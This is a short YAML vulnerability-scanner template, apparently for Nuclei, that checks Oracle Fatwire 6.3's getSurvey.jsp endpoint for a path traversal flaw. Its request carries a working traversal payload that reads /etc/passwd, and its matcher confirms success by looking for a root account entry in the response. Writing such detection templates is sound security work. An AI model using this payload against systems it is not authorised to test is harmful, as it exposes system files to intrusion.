27 lines
755 B
YAML
27 lines
755 B
YAML
id: oracle-fatwire-lfi
|
|
|
|
info:
|
|
name: Oracle Fatwire 6.3 - Path Traversal
|
|
author: Bernardo Rodrigues @bernardofsr
|
|
severity: critical
|
|
description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50167
|
|
tags: lfi,oracle,fatwire
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|